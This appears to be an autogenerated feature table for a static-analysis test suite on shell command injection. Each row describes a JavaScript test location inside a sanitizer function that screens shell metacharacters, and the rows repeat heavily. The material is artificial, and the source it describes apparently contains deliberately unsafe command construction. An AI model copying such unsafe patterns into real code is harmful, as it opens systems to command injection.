autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:15 | s[i] === ')' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:15 | s[i] === ')' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:15 | s[i] === ')' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:15 | s[i] === ')' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:4:390:15 | s[i] === ')' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:6:390:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:6:390:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:6:390:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:6:390:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:6:390:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:13:390:15 | ')' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:13:390:15 | ')' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:13:390:15 | ')' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:13:390:15 | ')' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:390:13:390:15 | ')' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:15 | s[i] === ']' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:15 | s[i] === ']' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:15 | s[i] === ']' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:15 | s[i] === ']' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:4:391:15 | s[i] === ']' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:6:391:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:6:391:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:6:391:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:6:391:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:6:391:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:13:391:15 | ']' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:13:391:15 | ']' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:13:391:15 | ']' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:13:391:15 | ']' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:391:13:391:15 | ']' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:15 | s[i] === '#' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:15 | s[i] === '#' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:15 | s[i] === '#' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:15 | s[i] === '#' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:4:392:15 | s[i] === '#' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:6:392:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:6:392:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:6:392:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:6:392:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:6:392:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:13:392:15 | '#' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:13:392:15 | '#' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:13:392:15 | '#' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:13:392:15 | '#' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:392:13:392:15 | '#' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:393:4:393:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 